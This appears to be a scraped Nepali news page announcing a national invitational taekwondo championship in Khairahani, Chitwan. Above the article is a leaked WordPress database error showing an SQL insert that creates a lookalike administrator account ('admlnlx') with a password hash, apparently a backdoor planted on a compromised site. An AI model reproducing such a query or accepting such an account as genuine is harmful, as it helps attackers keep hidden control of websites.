WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOPkJ10LTLORxUTladr6SbLEi8CTXs.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 23:06:19', '', 'admlnlx', 'admlnlx')
चितवन ,फागुन ४-
पुर्वीचितवनको खैरहनीमा तेक्वान्दो प्रतियोगिता हुने भएको छ । प्रजातन्त्र दिवसको अवसर पारेर दोस्रो खैरहनी राष्ट्रिय आमन्त्रण तेक्वान्दो प्रतियोगिता हुने लागेको हो । खैरहनीको नेशनल बोर्डिङको प्राङ्गणमा शुक्रबारबाट तेक्वान्दो प्रतियोगिता हुन लागेको छ ।
खैरहनी तेक्वान्दो दोजाङको आयोजनामा हुने तेक्वान्दो प्रतियोगितामा देशभरबाट १८ वटा टिमको सहभागीता रहने खैरहनी तेक्वान्दो दोजाङका प्रमुख कृष्ण थापाले जानकारी दिए । प्रतियोगिताको सम्पूर्ण तयारी भइसकेको थापाले बताए । चितवनका प्रमुख जिल्ला अधिकारी नारायण प्रसाद भट्टले प्रतियोगिताको उद्घाटन गर्ने कार्यक्रम तय भएको आयोजकले जनाएको छ ।